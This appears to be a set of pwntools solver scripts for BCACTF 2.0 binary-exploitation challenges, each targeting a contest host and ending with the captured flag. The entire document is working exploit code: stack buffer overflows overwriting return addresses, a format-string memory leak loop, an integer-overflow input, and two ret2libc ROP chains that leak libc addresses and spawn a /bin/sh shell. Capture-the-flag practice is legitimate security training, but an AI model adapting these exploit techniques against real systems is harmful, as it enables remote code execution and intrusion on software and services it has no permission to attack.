BCACTF 2.0

AdvancedMathAnalysis.py

from pwn import *

# p = process('./adv-analysis')
p = remote('bin.bcactf.com', 49156)

payload = b'i pledge to not cheat\0'
payload = payload.ljust(0x48, b'\0')
payload += p64(0x401216)

p.sendline(payload)
p.interactive()

# bcactf{corresponding_parts_of_congurent_triangles_are_congruent_ie_CPCCTCPTPPTCTC}

AmericanLiterature.py

from pwn import *

r = b''

for i in range(20, 40):
    # p = process('./amer-lit', aslr = False)
    p = remote('bin.bcactf.com', 49157)
    
    payload = f'%{i}$p'

    p.sendline(payload)
    p.recvuntil(':')

    p.recvline()
    p.recvline()
    p.recvline()
    p.recvline()

    r += bytes.fromhex(p.recvline()[6:-5].decode())[::-1]
    print(repr(r))

    p.close()

# bcactf{totally_not_employing_the_use_of_generic_words_to_reach_the_required_word_limit_nope_not_me}

AP-ABCs.py

from pwn import *

# p = process('./ap-abcs')
p = remote('bin.bcactf.com', 49154)

payload = b'\0'*(0x50-0x4)
payload += p32(0x73434241)

p.sendline(payload)

p.interactive()

# bcactf{bca_is_taking_APs_in_june_aaaaaaaa_wish_past_me_luck}

BCAMart.py

from pwn import *

# p = process('./bca-mart')
p = remote('bin.bcactf.com', 49153)

p.sendlineafter('>', '1')
p.sendlineafter('>', '1073741832')

p.sendlineafter('>', '6')
p.sendlineafter('>', '1')

p.interactive()

# bcactf{bca_store??_wdym_ive_never_heard_of_that_one_before}

ComputerSecurity.py

from pwn import *

# p = process('./notesearch')
p = remote('bin.bcactf.com', 49159)
e = ELF('./notesearch')
libc = ELF('/usr/lib/x86_64-linux-gnu/libc-2.31.so')

pop_rdi = 0x0000000000401703
pop_rsi = 0x0000000000401701
ret = 0x000000000040101a

payload = b'a'*0x78
payload += p64(pop_rdi)
payload += p64(e.got['puts'])
payload += p64(e.plt['puts'])
payload += p64(e.sym['main'])

p.sendline(payload)
p.recvuntil('end of')
p.recvline()

libc_leak = u64(p.recvline()[:-1].ljust(8, b'\0'))
libc_base = libc_leak - libc.sym['puts']
system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b'/bin/sh'))

print(hex(libc_leak))
print(hex(libc_base))
print(hex(system))
print(hex(binsh))

payload = b'a'*0x78
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(ret)
payload += p64(system)

p.sendline(payload)
p.interactive()

# bcactf{jose!_yeah_you!_why_dont_you_play_us_a_Bbbb?}

DiscreteMathematics.py

from pwn import *

context.log_level = 'debug'

# p = process('./discrete')
p = remote('bin.bcactf.com', 49160)
e = ELF('./discrete')
libc = ELF('/usr/lib/x86_64-linux-gnu/libc-2.31.so')

pop_rdi = 0x00000000004017a3
pop_rsi = 0x00000000004017a1
ret = 0x000000000040101a
main = 0x401611

payload = b'i will get an A'.ljust(0x48, b'\0')
payload += p64(pop_rdi)
payload += p64(e.got['puts'])
payload += p64(e.plt['puts'])
payload += p64(main)

# pause()
p.sendline(payload)
p.recvuntil('Good luck.\n')

libc_leak = u64(p.recvline()[:-1].ljust(8, b'\0'))
libc_base = libc_leak - libc.sym['puts']
system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b'/bin/sh'))

print(hex(libc_leak))
print(hex(libc_base))

payload = b'i will get an A'.ljust(0x48, b'\0')
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(ret)
payload += p64(system)

p.sendline(payload)
p.interactive()

# bcactf{the_limit_as_t_approaches_the_ctf_of_my_sanity_approaches_0}

HonorsABCs.py

from pwn import *

# p = process('./honors-abcs', aslr=False)
p = remote('bin.bcactf.com', 49155)

payload = b'b'*(0x50-0x4)
payload += p32(0x10101010)

p.sendlineafter('for 1:', payload)

p.interactive()

# bcactf{now_i_know_my_A_B_Cs!!_next_time_wont_you_cheat_with_me??}

MathAnalysis.py

from pwn import *

# p = process('./analysis', aslr=False)
p = remote('bin.bcactf.com', 49158)

payload = b'a'*0x48
payload += p64(0x401256)

p.sendline(payload)
p.interactive()

# bcactf{challenges_are_just_functions_mapping_from_coffee_to_points}